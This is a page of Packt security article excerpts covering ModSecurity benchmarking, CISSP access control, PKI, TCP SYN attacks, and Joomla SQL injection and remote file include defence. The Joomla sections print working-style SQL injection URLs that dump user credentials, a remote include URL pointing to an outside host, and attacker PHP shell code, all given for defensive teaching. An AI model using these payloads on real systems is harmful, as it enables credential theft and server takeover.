[B]: 95.0Reply rate [replies/s]: min 46.0 avg 49.0 max 50.0 stddev 2.0 (4samples)Reply time [ms]: response 103.1 transfer 202.9Reply size [B]: header 244.0 content 19531.0 footer 0.0 (total19775.0)Reply status: 1xx=0 2xx=1000 3xx=0 4xx=0 5xx=0CPU time [s]: user 2.37 system 17.14 (user 11.6% system 84.1% total95.7%)Net I/O: 951.9 KB/s (7.8*10^6 bps)Errors: total 0 client-timo 0 socket-timo 0 connrefused 0 connreset 0Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0 The output shows us the number of TCP connections httperf initiated per second ("Connection rate"), the rate at which it requested files from the server ("Request rate"), and the actual reply rate that the server was able to provide ("Reply rate"). We also get statistics on the reply time—the "reply time – response" is the time taken from when the first byte of the request was sent to the server to when the first byte of the reply was received—in this case around 103 milliseconds. The transfer time is the time to receive the entire response from the server. The page we will be requesting in this case, index.html, is 20 KB in size which is a pretty average size for an HTML document. httperf requests the page one time per connection and doesn't follow any links in the page to download additional embedded content or script files, so the number of such links in the page is of no relevance to our test. Getting a baseline: Testing without ModSecurity When running benchmarking tests like this one, it's always important to get a baseline result so that you know the performance of your server when the component you're measuring is not involved. In our case, we will run the tests against the server when ModSecurity is disabled. This will allow us to tell which impact, if any, running with ModSecurity enabled has on the server. Response time The following chart shows the response time, in milliseconds, of the server when it is running without ModSecurity. The number of requests per second is on the horizontal axis: As we can see, the server consistently delivers response times of around 300 milliseconds until we reach about 75 requests per second. Above this, the response time starts increasing, and at around 500 requests per second the response time is almost a second per request. This data is what we will use for comparison purposes when looking at the response time of the server after we enable ModSecurity. Memory usage Finding the memory usage on a Linux system can be quite tricky. Simply running the Linux top utility and looking at the amount of free memory doesn't quite cut it, and the reason is that Linux tries to use almost all free memory as a disk cache. So even on a system with several gigabytes of memory and no memory-hungry processes, you might see a free memory count of only 50 MB or so. Another problem is that Apache uses many child processes, and to accurately measure the memory usage of Apache we need to sum the memory usage of each child process. What we need is a way to measure the memory usage of all the Apache child processes so that we can see how much memory the web server truly uses. To solve this, here is a small shell script that I have written that runs the ps command to find all the Apache processes. It then passes the PID of each Apache process to pmap to find the memory usage, and finally uses awk to extract the memory usage (in KB) for summation. The result is that the memory usage of Apache is printed to the terminal. The actual shell command is only one long line, but I've put it into a file called apache_mem.sh to make it easier to use: #!/bin/sh# apache_mem.sh# Calculate the Apache memory usageps -ef | grep httpd | grep ^apache | awk '{ print $2 }' | xargs pmap -x | grep 'total kB' | awk '{ print $3 }' | awk '{ sum += $1 } END { print sum }' Now, let's use this script to look at the memory usage of all of the Apache processes while we are running our performance test. The following graph shows the memory usage of Apache as the number of requests per second increases: Apache starts out consuming about 300 MB of memory. Memory usage grows steadily and at about 150 requests per second it starts climbing more rapidly. At 500 requests per second, the memory usage is over 2.4 GB—more than the amount of physical RAM of the server. The fact that this is possible is because of the virtual memory architecture that Linux (and all modern operating systems) use. When there is no more physical RAM available, the kernel starts swapping memory pages out to disk, which allows it to continue operating. However, since reading and writing to a hard drive is much slower than to memory, this starts slowing down the server significantly, as evidenced by the increase in response time seen in the previous graph. CPU usage In both of the tests above, the server's CPU usage was consistently around 1 to 2%, no matter what the request rate was. You might have expected a graph of CPU usage in the previous and subsequent tests, but while I measured the CPU usage in each test, it turned out to run at this low utilization rate for all tests, so a graph would not be very useful. Suffice it to say that in these tests, CPU usage was not a factor. ModSecurity without any loaded rules Now, let's enable ModSecurity—but without loading any rules—and see what happens to the response time and memory usage. Both SecRequestBodyAccess and SecResponseBodyAccess were set to On, so if there is any performance penalty associated with buffering requests and responses, we should see this now that we are running ModSecurity without any rules. The following graph shows the response time of Apache with ModSecurity enabled: We can see that the response time graph looks very similar to the response time graph we got when ModSecurity was disabled. The response time starts increasing at around 75 requests per second, and once we pass 350 requests per second, things really start going downhill. The memory usage graph is also almost identical to the previous one: Apache uses around 1.3 MB extra per child process when ModSecurity is loaded, which equals a total increase of memory usage of 26 MB for this particular setup. Compared to the total amount of memory Apache uses when the server is idle (around 300 MB) this equals an increase of about 10%. Mod Security with the core ruleset loaded Now for the really interesting test we'll run httperf against ModSecurity with the core ruleset loaded and look at what that does to the response time and memory usage. Response time The following graph shows the server response time with the core ruleset loaded: At first, the response time is around 340 ms, which is about 35 ms slower than in previous tests. Once the request rate gets above 50, the server response time starts deteriorating. As the request rates grows, the response time gets worse and worse, reaching a full 5 seconds at 100 requests per second. I have capped the graph at 100 requests per second, as the server performance has already deteriorated enough at this point to allow us to see the trend. We see that the point at which memory usage starts increasing has gone down from 75 to 50 requests per second now that we have enabled the core ruleset. This equals a reduction in the maximum number of requests per second the server can handle of 33%.
Read more
  • 0
  • 0
  • 10706
article-image-cissp-security-measures-access-control
Packt
27 Nov 2009
4 min read
Save for later

CISSP: Security Measures for Access Control

Packt
27 Nov 2009
4 min read
Knowledge requirements A candidate appearing for the CISSP exam should have knowledge in the following areas that relate to access control: Control access by applying concepts, methodologies, and techniques Identify, evaluate, and respond to access control attacks such as Brute force attack, dictionary, spoofing, denial of service, etc. Design, coordinate, and evaluate penetration test(s) Design, coordinate, and evaluate vulnerability test(s) The approach In accordance with the knowledge expected in the CISSP exam, this domain is broadly grouped under five sections as shown in the following diagram: Section 1: The Access Control domain consists of many concepts, methodologies, and some specific techniques that are used as best practices. This section coverssome of the basic concepts, access control models, and a few examples of access control techniques. Section 2: Authentication processes are critical for controlling access to facilities and systems. This section looks into important concepts that establish the relationship between access control mechanisms and authentication processes. Section 3: A system or facility becomes compromised primarily through unauthorized access either through the front door or the back door. We'll see some of the common and popular attacks on access control mechanisms, and also learn about the prevalent countermeasures to such attacks. Section 4: An IT system consists of an operating system software, applications, and embedded software in the devices to name a few. Vulnerabilities in such software are nothing but holes or errors. In this section we see some of the common vulnerabilities in IT systems, vulnerability assessment techniques, and vulnerability management principles. Section 5: Vulnerabilities are exploitable, in the sense that the IT systems can be compromised and unauthorized access can be gained by exploiting the vulnerabilities. Penetration testing or ethical hacking is an activity that tests the exploitability of vulnerabilities for gaining unauthorized access to an IT system. Today, we'll quickly review some of the important concepts in the Sections 1, 2,and 3. Access control concepts, methodologies, and techniques Controlling access to the information systems and the information processing facilities by means of administrative, physical, and technical safeguards is the primary goal of access control domain. Following topics provide insight into someof the important access control related concepts, methodologies, and techniques. Basic concepts One of the primary concepts in access control is to understand the subject and the object. A subject may be a person, a process, or a technology component that either seeks access or controls the access. For example, an employee trying to access his business email account is a subject. Similarly, the system that verifies the credentials such as username and password is also termed as a subject. An object can be a file, data, physical equipment, or premises which need controlled access. For example, the email stored in the mailbox is an object that a subject is trying to access. Controlling access to an object by a subject is the core requirement of an access control process and its associated mechanisms. In a nutshell, a subject either seeks or controls access to an object. An access control mechanism can be classified broadly into the following two types: If access to an object is controlled based on certain contextual parameters, such as location, time, sequence of responses, access history, and so on, then it is known as a context-dependent access control. In this type of control, the value of the asset being accessed is not a primary consideration. Providing the username and password combination followed by a challenge and response mechanism such as CAPTCHA, filtering the access based on MAC adresses in wireless connections, or a firewall filtering the data based on packet analysis are all examples of context-dependent access control mechanisms. Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a challenge-response test to ensure that the input to an access control system is supplied by humans and not by machines. This mechanism is predominantly used by web sites to prevent Web Robots(WebBots) to access the controlled section of the web site by brute force methods The following is an example of CAPTCHA: If the access is provided based on the attributes or content of an object,then it is known as a content-dependent access control. In this type of control, the value and attributes of the content that is being accessed determines the control requirements. For example, hiding or showing menus in an application, views in databases, and access to confidential information are all content-dependent.
Read more
  • 0
  • 0
  • 7737

article-image-public-key-infrastructure-pki-and-other-concepts-cryptography-cissp-exam
Packt
28 Oct 2009
10 min read
Save for later

Public Key Infrastructure (PKI) and other Concepts in Cryptography for CISSP Exam

Packt
28 Oct 2009
10 min read
Public key infrastructure Public Key Infrastructure (PKI) is a framework that enables integration of various services that are related to cryptography. The aim of PKI is to provide confidentiality, integrity, access control, authentication, and most importantly, non-repudiation. Non-repudiation is a concept, or a way, to ensure that the sender or receiver of a message cannot deny either sending or receiving such a message in future. One of the important audit checks for non-repudiation is a time stamp. The time stamp is an audit trail that provides information of the time the message is sent by the sender and the time the message is received by the receiver. Encryption and decryption, digital signature, and key exchange are the three primary functions of a PKI. RSS and elliptic curve algorithms provide all of the three primary functions: encryption and decryption, digital signatures, and key exchanges. Diffie-Hellmen algorithm supports key exchanges, while Digital Signature Standard (DSS) is used in digital signatures. Public Key Encryption is the encryption methodology used in PKI and was initially proposed by Diffie and Hellman in 1976. The algorithm is based on mathematical functions and uses asymmetric cryptography, that is, uses a pair of keys. The image above represents a simple document-signing function. In PKI, every user will have two keys known as "pair of keys". One key is known as a private key and the other is known as a public key. The private key is never revealed and is kept with the owner, and the public key is accessible by every one and is stored in a key repository. A key can be used to encrypt as well as to decrypt a message. Most importantly, a message that is encrypted with a private key can only be decrypted with a corresponding public key. Similarly, a message that is encrypted with a public key can only be decrypted with the corresponding private key. In the example image above, Bob wants to send a confidential document to Alice electronically. Bob has four issues to address before this electronic transmission can occur: Ensuring the contents of the document are encrypted such that the document is kept confidential. Ensuring the document is not altered during transmission. Since Alice does not know Bob, he has to somehow prove that the document is indeed sent by him. Ensuring Alice receives the document and that she cannot deny receiving it in future. PKI supports all the above four requirements with methods such as secure messaging, message digests, digital signatures, and non-repudiation services. Secure messaging To ensure that the document is protected from eavesdropping and not altered during the transmission, Bob will first encrypt the document using Alice's public key. This ensures two things: one, that the document is encrypted, and two, only Alice can open it as the document requires the private key of Alice to open it. To summarize, encryption is accomplished using the public key of the receiver and the receiver decrypts with his or her private key. In this method, Bob could ensure that the document is encrypted and only the intended receiver (Alice) can open it. However, Bob cannot ensure whether the contents are altered (Integrity) during transmission by document encryption alone. Message digest In order to ensure that the document is not altered during transmission, Bob performs a hash function on the document. The hash value is a computational value based on the contents of the document. This hash value is known as the message digest. By performing the same hash function on the decrypted document the message, the digest can be obtained by Alice and she can compare it with the one sent by Bob to ensure that the contents are not altered. This process will ensure the integrity requirement. Digital signature In order to prove that the document is sent by Bob to Alice, Bob needs to use a digital signature. Using a digital signature means applying the sender's private key to the message, or document, or to the message digest. This process is known as as signing. Only by using the sender's public key can the message be decrypted. Bob will encrypt the message digest with his private key to create a digital signature. In the scenario illustrated in the image above, Bob will encrypt the document using Alice's public key and sign it using his digital signature. This ensures that Alice can verify that the document is sent by Bob, by verifying the digital signature (Bob's private key) using Bob's public key. Remember a private key and the corresponding public key are linked, albeit mathematically. Alice can also verify that the document is not altered by validating the message digest, and also can open the encrypted document using her private key. Message authentication is an authenticity verification procedure that facilitates the verification of the integrity of the message as well as the authenticity of the source from which the message is received. Digital certificate By digitally signing the document, Bob has assured that the document is sent by him to Alice. However, he has not yet proved that he is Bob. To prove this, Bob needs to use a digital certificate. A digital certificate is an electronic identity issued to a person, system, or an organization by a competent authority after verifying the credentials of the entity. A digital certificate is a public key that is unique for each entity. A certification authority issues digital certificates. In PKI, digital certificates are used for authenticity verification of an entity. An entity can be an individual, system, or an organization. An organization that is involved in issuing, distributing, and revoking digital certificates is known as a Certification Authority (CA). A CA acts as a notary by verifying an entity's identity. One of the important PKI standards pertaining to digital certificates is X.509. It is a standard published by the International Telecommunication Union (ITU) that specifies the standard format for digital certificates. PKI also provides key exchange functionality that facilitates the secure exchange of public keys such that the authenticity of the parties can be verified. Key management procedures Key management consists of four essential procedures concerning public and private keys. They are as follows: Secure generation of keys—Ensures that private and public keys are generated in a secure manner. Secure storage of keys—Ensures that keys are stored securely. Secure distribution of keys—Ensures that keys are not lost or modified during distribution. Secure destruction of keys—Ensures that keys are destroyed completely once the useful life of the key is over. Type of keys NIST Special Publication 800-57 titled Recommendation for Key Management - Part 1: General specifies the following nineteen types of keys: Private signature key—It is a private key of public key pairs and is used to generate digital signatures. It is also used to provide authentication, integrity, and non-repudiation. Public signature verification key—It is the public key of the asymmetric (public) key pair. It is used to verify the digital signature. Symmetric authentication key—It is used with symmetric key algorithms to provide assurance of the integrity and source of the messages. Private authentication key—It is the private key of the asymmetric (public) key pair. It is used to provide assurance of the integrity of information. Public authentication key—Public key of an asymmetric (public) pair that is used to determine the integrity of information and to authenticate the identity of entities. Symmetric data encryption key—It is used to apply confidentiality protection to information. Symmetric key wrapping key—It is a key-encryptin key that is used to encrypt the other symmetric keys. Symmetric and asymmetric random number generation keys—They are used to generate random numbers. Symmetric master key—It is a master key that is used to derive other symmetric keys. Private key transport key—They are the private keys of asymmetric (public) key pairs, which are used to decrypt keys that have been encrypted with the associated public key. Public key transport key—They are the public keys of asymmetric (public) key pairs that are used to decrypt keys that have been encrypted with the associated public key. Symmetric agreement key—It is used to establish keys such as key wrapping keys and data encryption keys using a symmetric key agreement algorithm. Private static key agreement key—It is a private key of asymmetric (public) key pairs that is used to establish keys such as key wrapping keys and data encryption keys. Public static key agreement key— It is a public key of asymmetric (public) key pairs that is used to establish keys such as key wrapping keys and data encryption keys. Private ephemeral key agreement key—It is a private key of asymmetric (public) key pairs used only once to establish one or more keys such as key wrapping keys and data encryption keys. Public ephemeral key agreement key—It is a public key of asymmetric (public) key pairs that is used in a single key establishment transaction to establish one or more keys. Symmetric authorization key—This key is used to provide privileges to an entity using symmetric cryptographic method. Private authorization key—It is a private key of an asymmetric (public) key pair that is used to provide privileges to an entity. Public authorization key—It is a public key of an asymmetric (public) key pair that is used to verify privileges for an entity that knows the associated private authorization key.   Key management best practices Key Usage refers to using a key for a cryptographic process, and should be limited to using a single key for only one cryptographic process. This is to ensure that the strength of the security provided by the key is not weakened. When a specific key is authorized for use by legitimate entities for a period of time, or the effect of a specific key for a given system is for a specific period, then the time span is known as a cryptoperiod. The purpose of defining a cryptoperiod is to limit a successful cryptanalysis by a malicious entity. Cryptanalysis is the science of analyzing and deciphering code and ciphers. The following assurance requirements are part of the key management process: Integrity protection—Assuring the source and format of the keying material by verification Domain parameter validity—Assuring parameters used by some public key algorithms during the generation of key pairs and digital signatures, and the generation of shared secrets that are subsequently used to derive keying material Public key validity—Assuring that the public key is arithmetically correct Private key possession—Assuring that the possession of the private key is obtained before using the public key Cryptographic algorithm and key size selection are the two important key management parameters that provide adequate protection to the system and the data throughout their expected lifetime. Key states A cryptographic key goes through different states from its generation to destruction. These states are defined as key states. The movement of a cryptographic key from one state to another is known as a key transition. NIST SP800-57 defines the following six key states: Pre-activation state—The key has been generated, but not yet authorized for use Active state—The key may used to cryptographically protect information Deactivated state—The cryptoperiod of the key is expired, but the key is still needed to perform cryptographic operations Destroyed state—The key is destroyed Compromised state—The key is released or determined by an unauthorized entity Destroyed compromised state—The key is destroyed after a compromise or the comprise is found after the key is destroyed
Read more
  • 0
  • 0
  • 12218

article-image-telecommunications-and-network-security-concepts-cissp-exam
Packt
28 Oct 2009
5 min read
Save for later

Telecommunications and Network Security Concepts for CISSP Exam

Packt
28 Oct 2009
5 min read
Transport layer The transport layer in the TCP/IP model does two things: it packages the data given out by applications to a format that is suitable for transport over the network, and it unpacks the data received from the network to a format suitable for applications. The process of packaging the data packets received from the applications is known as encapsulation. The output of such a process is known as datagram. Similarly, the process of unpacking the datagram received from the network is known as abstraction A transport section in a protocol stack carries the information that is in the form of datagrams, Frames and Bits. Transport layer protocols There are many transport layer protocols that carry the transport layer functions. The most important ones are: Transmission Control Protocol (TCP): It is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. User Datagram Protocol (UDP): This protocol is similar to TCP, but is connectionless. A connection-oriented protocol is a protocol that guarantees delivery of datagram (packets) to the destination application by way of a suitable mechanism. For example, a three-way handshake syn, syn-ack, ack in TCP. The reliability of datagram delivery of such protocol is high. A protocol that does not guarantee the delivery of datagram, or packets, to the destination is known as connectionless protocol. These protocols use only one-way communication. The speed of the datagram's delivery by such protocols is high. Other transport layer protocols are as follows: Sequenced Packet eXchange (SPX): SPX is a part of the IPX/SPX protocol suit and used in Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol. Stream Control Transmission Protocol (SCTP): It is a connection-oriented protocol similar to TCP, but provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems. Appletalk Transaction Protocol (ATP): It is a proprietary protocol developed for Apple Macintosh computers. Datagram Congestion Control Protocol (DCCP): As the name implies, it is a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network. Fiber Channel Protocol (FCP): This protocol is used in high-speed networking such as Gigabit networking. One of its prominent applications is Storage Area Network (SAN). SAN is network architecture that's used for attaching remote storage devices such as tape drives, disk arrays, and so on to the local server. This facilitates the use of storage devices as if they were local devices. In the following sections we'll review the most important protocols—TCP and UDP. Transmission Control Protocol (TCP) TCP is a connection-oriented protocol that is widely used in Internet communications. As the name implies, a protocol has two primary functions. The primary function of TCP is the transmission of datagram between applications, while the secondary function is related to controls that are necessary for ensuring reliable transmissions. Protocol / Service Transmission Control Protocol (TCP) Layer(s) TCP works in the transport layer of the TCP/IP model Applications Applications where the delivery needs to be assured such as email, World Wide Web (WWW), file transfer, and so on use TCP for transmission Threats Service disruption Vulnerabilities Half-open connections Attacks Denial-of- service attacks such as TCP SYN attacks Connection hijacking such as IP Spoofing attacks Countermeasures Syn cookies Cryptographic solutions   A half-open connection is a vulnerability in TCP implementation. TCP uses a three-way handshake to establish or terminate connections. Refer to the following illustration: In a three-way handshake, first the client (workstation) sends a request to the server (www.some_website.com). This is known as an SYN request. The server acknowledges the request by sending SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery. If the client does not send the final ACK, then the connection is known as half-open. Since the server has created a buffer for that connection, certain amounts of memory or server resources are consumed. If thousands of such half-open connections are created maliciously, the server resources may be completely consumed resulting in a denial-of-service to legitimate requests. TCP SYN attacks are technically establishing thousands of half-open connections to consume the server resources. Two actions can be taken by an attacker. The attacker, or malicious software, will send thousands of SYN to the server and withhold the ACK. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, in a span of time the entire resources will be consumed. This will result in a denial-of-service. If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing. SYN attacks, such as SYN flooding and SYN spoofing, can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. The server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, which it sends as SYN-ACK. When the server receives an ACK, it checks the details and creates the connection. A cookie is a piece of information, usually in a form of text file, sent by the server to client. Cookies are generally stored on a client's computer and are used for purposes such as authentication, session tracking, and management. User Datagram Protocol (UDP) UDP is a connectionless protocol similar to TCP. However, UDP does not provide delivery guarantee of data packets.  
Read more
  • 0
  • 0
  • 3087
article-image-preventing-sql-injection-attacks-your-joomla-websites
Packt
23 Oct 2009
6 min read
Save for later

Preventing SQL Injection Attacks on your Joomla Websites

Packt
23 Oct 2009
6 min read
Introduction Mark Twain once said, "There are only two certainties in life-death and taxes." Even in web security there are two certainties: It's not "if you are attacked", but "when and how" your site will be taken advantage of. There are several types of attacks that your Joomla! site may be vulnerable to such as CSRF, Buffer Overflows, Blind SQL Injection, Denial of Service, and others that are yet to be found. The top issues in PHP-based websites are: Incorrect or invalid (intentional or unintentional) input Access control vulnerabilities Session hijacks and attempts on session IDs SQL Injection and Blind SQL Injection Incorrect or ignored PHP configuration settings Divulging too much in error messages and poor error handling Cross Site Scripting (XSS) Cross Site Request Forgery, that is CSRF (one-click attack) SQL Injections SQL databases are the heart of Joomla! CMS. The database holds the content, the users' IDs, the settings, and more. To gain access to this valuable resource is the ultimate prize of the hacker. Accessing this can gain him/her an administrative access that can gather private information such as usernames and passwords, and can allow any number of bad things to happen. When you make a request of a page on Joomla!, it forms a "query" or a question for the database. The database is unsuspecting that you may be asking a malformed question and will attempt to process whatever the query is. Often, the developers do not construct their code to watch for this type of an attack. In fact, in the month of February 2008, twenty-one new SQL Injection vulnerabilities were discovered in the Joomla! land. The following are some examples presented for your edification. Using any of these for any purpose is solely your responsibility and not mine: Example 1 index.php?option=com_****&Itemid=name&cmd=section&section=-  000/**/union+select/**/000,111,222,      concat(username,0x3a,password),0,     concat(username,0x3a,password)/**/from/**/jos_users/* Example 2 index.php?option=com_****&task=****&Itemid=name&catid=97&aid=- 9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/ concat(username,0x3a,password),0x3a,password, 0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/ from/**/jos_users/* Both of these will reveal, under the right set of circumstances, the usernames and passwords in your system. There is a measure of protection in Joomla! 1.0.13, with an encryption scheme that will render the passwords useless. However, it does not make sense to allow extensions that are vulnerable to remain. Yielding ANY kind of information like this is unacceptable. The following screenshot displays the results of the second example running on a test system with the vulnerable extension. The two pieces of information are the username that is listed as Author, and the Hex string (partially blurred) that is the hashed password: You can see that not all MD5 hashes can be broken easily. Though it won't be shown here, there is a website available where you enter your hash and it attempts to crack it. It supports several popular hashes. When I entered this hash (of a password) into the tool, I found the password to be Anthony. It's worth noting that this hash and its password are a result of a website getting broken into, prompting the user to search for the "hash" left behind, thus yielding the password. The important news, however, is that if you are using Joomla! 1.0.13 or greater, the password's hash is now calculated with a "salt", making it nearly impossible to break. However, the standard MD5 could still be broken with enough effort in many cases. For more information about salting and MD5 see:http://www.php.net/md5. For an interesting read on salting, you may wish to read this link:www.governmentsecurity.org/forum/lofiversion/index.php/t19179.htm SQL Injection is a query put to an SQL database where data input was expected AND the application does not correctly filter the input. It allows hijacking of database information such as usernames and passwords, as we saw in the earlier example. Most of these attacks are based on two things. First, the developers have coding errors in their code, or they potentially reused the code from another application, thus spreading the error. The other issue is the inadequate validation of input. In essence, it means trusting the users to put in the RIGHT stuff, and not put in queries meant to harm the system. User input is rarely to be trusted for this reason. It should always be checked for proper format, length, and range. There are many ways to test for vulnerability to an SQL Injection, but one of the most common ones is as follows: In some cases, this may be enough to trigger a database to divulge details. This very simplistic example would not work in the login box that is shown. However, if it were presented to a vulnerable extension in a manner such as the following it might work: <FORM action=http://www.vulnerablesite.com/Search.php method=post><input type=hidden name=A value="me' or 1=1--"></FORM> This "posting" method (presented as a very generic exploit and not meant to work per se in Joomla!) will attempt to break into the database by putting forward queries that would not necessarily be noticed. But why 1=1- - ? According to PHP.NET, "It is a common technique to force the SQL parser to ignore the rest of the query written by the developer with-- which is the comment sign in SQL." You might be thinking, "So what if my passwords are hashed? They can get them but they cannot break them!" This is true, but if they wanted it badly, nothing keeps them from doing something such as this: INSERT INTO jos_mydb_users  ('email','password','login_id','full_name')  VALUES ('johndoe@email.com','default','Jdoe','John Doe');--'; This code has a potential if inserted into a query such as this: http://www.yourdomain/vulnerable_extension//index.php?option=com_vulext INSERT INTO jos_mydb_users ('email','password','login_id','full_name') VALUES ('johndoe@email.com','default','Jdoe','John Doe');--'; Again, this is a completely bogus example and is not likely to work. But if you can get an SQL DB to divulge its information, you can get it to "accept" (insert) information it should not as well. 
Read more
  • 0
  • 0
  • 5133

article-image-preventing-remote-file-includes-attack-your-joomla-websites
Packt
15 Oct 2009
7 min read
Save for later

Preventing Remote File Includes Attack on your Joomla Websites

Packt
15 Oct 2009
7 min read
PHP is an open-source server-side scripting language. It is the basis of many web applications. It works very nicely with database platforms such as Joomla!. Since Joomla! is growing, and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible. In my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has some glaring holes, it won't be useable. The administrators and site development folks have the next layer of responsibility to ensure that they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two are combined and executed properly, they will result in secure web transactions. The SQL Injections, though very nasty, can be prevented in many cases; but a RFI attack is a more difficult one to stop altogether. So, it is important that you are aware of them and know their signs. Remote File Includes An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that File Inclusion attacks, such as these, can mostly be mitigated by turning Register_Globals off.Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion. The following is a sanitized attempt to attack a server in just such a manner: http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? If the site in this example did not have appropriate safeguards in place, the following code would be executed: $x0b="inx72_147x65x74"; $x0c="184rx74o154x6fwex72"; echo "c162141156kx5fr157cx6bs";if (@$x0b("222x61x33e_x6d144e") or $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e"){ echo "345a146x65155od145x3ao156";}else{echo "345a146ex6dox64e:x6ffx66";}exit(); ?> This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it to be executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another: {echo "345a146x65155od145x3ao156";}else{ echo "345a146ex6dox64e:x6ffx66";}exit(); Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL: <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C><H1>Changing this CMD will result in corrupt scanning !</H1></html></head></body><?phpif((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{ini_restore("safe_mode");ini_restore("open_basedir");if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{echo("Safe Mode of this Server is : ");echo("SafemodeON");}}...@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}exit; This sanitized example wants to learn if we are running SAFE MODE on or off, and then would attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a Command Shell is equivalent to running START | RUN | CMD, thus opening what we would call a "DOS prompt". Other methods of attack include the following: Evil code uploaded through session files, or through image uploads is a way of attacking. Another method of attack is the insertion or placement of code that you might think would be safe, such as compressed audio streams. These do not get inspected as they should be, and could allow access to remote resources. It is noteworthy that this can slip past even if you have set the allow_url_fopen or allow_url_include to disabled. A common method is to take input from the request POST data versus a data file. There are several other methods beyond this list. And just judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for robust security architecture, and to be very careful in accepting the user input on our websites. The Most Basic Attempt You don't always need a heavy or fancy code as in the earlier examples. Just appending a page request of sorts to the end of our URL will do it. Remember this? /?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? Here we're instructing the server to force our path to change in our environment to match the code located out there. Here is such a "shell": <?php$file =$_GET['evil-page'];include($file .".php");?> What Can We Do to Stop This? As stated repeatedly, in-depth defense is the most important of design considerations. Putting up many layers of defense will enable you to withstand the attacks. This type of attack can be defended against at the .htaccess level and by filtering the inputs. One problem is that we tend to forget that many defaults in PHP set up a condition for failure. Take this for instance: allow_url_fopen is on by default. "Default? Why do you care?" you may ask. This, if enabled, allows the PHP file functions such as file_get_contents(), and the ever present include and require statements to work in a manner you may not have anticipated, such as retrieving the entire contents of your website, or allowing a determined attacker to break in. Since programmers sometimes forget to do proper input filtering in their user fields, such as an input box that allows any type of data to be inputted, or code to be inserted for an injection attack. Lots of site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part, and not disabling the allow_url_fopen option. This leads to code injections as in our previous examples. Make sure you keep the Global Registers OFF. This is a biggie that will prevent much evil! There are a few ways to do this and depending on your version of Joomla!, they are handled differently. In Joomla! versions less than 1.0.13, look for this code in the globals.php // no direct accessdefined( '_VALID_MOS' ) or die( 'Restricted access' );/* * Use 1 to emulate register_globals = on * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED * * Use 0 to emulate register_globals = off * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS */define( 'RG_EMULATION', 0 ); Make sure the RG_EMULATION has a ZERO (0) instead of one (1). When it's installed out of the box, it is 1, meaning register_globals is set to on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION BUTTON | SERVER tab: Have you upgraded from an earlier version of Joomla!?Affects: Joomla! 1.0.13—1.0.14
Read more
  • 0
  • 0
  • 3110